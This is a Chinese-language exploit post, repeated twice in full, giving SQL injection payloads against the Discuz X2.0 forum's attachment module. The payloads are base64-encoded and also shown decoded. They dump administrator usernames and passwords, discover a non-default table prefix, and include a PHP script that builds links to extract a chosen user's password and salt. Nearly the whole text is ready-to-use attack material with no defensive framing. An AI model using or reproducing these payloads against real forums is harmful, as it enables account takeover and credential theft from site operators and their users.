2024年2月25日发(作者：厚晨菲)

DZ2.0直接暴管理账号密码（默认前缀的情况下）

/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

rZSAnYWRtaW58eHx5%3D

base64解码

1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

from pre_common_member where username like ‗admin|x|y

如果不是默认前缀

暴前缀EXP

/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

———————–

再贴个PHP的EXP

$host=”X2.0论坛地址”;

$affuser=”要爆的用户名username”;

echo ‗

echo $host.‖?mod=attachment&findpost=ss&aid=‖;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from

INFORMATION_ where TABLE_SCHEMA=database() and TABLE_NAME

like ‘%_member|x|y”));

echo ‘” target=”_blank”>爆前缀’;

echo ―
‖;

echo ‗

echo $host.‖?mod=attachment&findpost=ss&aid=‖;

echo urlencode(base64_encode(“1′ and 1=2 union all select

1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username

like ‘$affuser|x|y”));

echo ‘” target=”_blank”>爆password,salt’;

?>

2024年2月25日发(作者：厚晨菲)

DZ2.0直接暴管理账号密码（默认前缀的情况下）

/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

rZSAnYWRtaW58eHx5%3D

base64解码

1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

from pre_common_member where username like ‗admin|x|y

如果不是默认前缀

暴前缀EXP

/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

———————–

再贴个PHP的EXP

$host=”X2.0论坛地址”;

$affuser=”要爆的用户名username”;

echo ‗

echo $host.‖?mod=attachment&findpost=ss&aid=‖;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from

INFORMATION_ where TABLE_SCHEMA=database() and TABLE_NAME

like ‘%_member|x|y”));

echo ‘” target=”_blank”>爆前缀’;

echo ―
‖;

echo ‗

echo $host.‖?mod=attachment&findpost=ss&aid=‖;

echo urlencode(base64_encode(“1′ and 1=2 union all select

1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username

like ‘$affuser|x|y”));

echo ‘” target=”_blank”>爆password,salt’;

?>